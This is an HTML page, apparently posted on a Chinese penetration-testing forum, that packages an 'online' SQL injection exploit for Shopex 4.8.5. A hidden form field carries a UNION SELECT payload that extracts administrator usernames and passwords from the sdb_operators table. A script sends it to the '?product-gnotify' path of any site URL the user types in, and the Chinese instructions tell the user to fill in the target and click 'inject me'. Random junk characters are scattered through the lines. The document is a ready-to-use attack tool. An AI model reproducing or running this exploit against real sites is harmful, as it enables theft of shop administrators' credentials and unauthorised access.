<center>; W Z. J7 D& b" }1 W
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
+ Y, C% A% g7 ?/ c' ~" P/ o<form action="" method="post" name="submit_url">
/ m7 j6 A+ k0 r3 D1 X网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
$ }- C: |6 m* D9 r/ P! ?0 b<input type="hidden" name="goods[goods_id]" value="3">
. p5 B( d7 Q( p5 F+ A- p/ V<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
: ~5 P5 |8 d& {9 _" u# Y* G<input type="submit" value="给我注入" onclick=fsubmit()>) @: q+ T4 ~" T5 Z: Q" A
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
_# E) J9 g8 y! f: F4 w- f' {; P! @5 p6 L, V
<script>
5 d$ \, g3 O: r% S% p) _, I/ Z5 |( ifunction fsubmit(){ 3 v9 i# X8 z7 H$ e! v4 o) U3 w: ], r
form = document.forms[0];
( N: b0 ~0 Y* i4 b/ r* B0 Aform.action = form.url.value+'/?product-gnotify';
5 }9 T# B5 b/ Yform.submit(); |% N5 K2 K8 I5 h. I
}
3 W8 |8 Z( O7 h</script>
9 W8 {# F5 w7 o5 x+ q2 ~, F |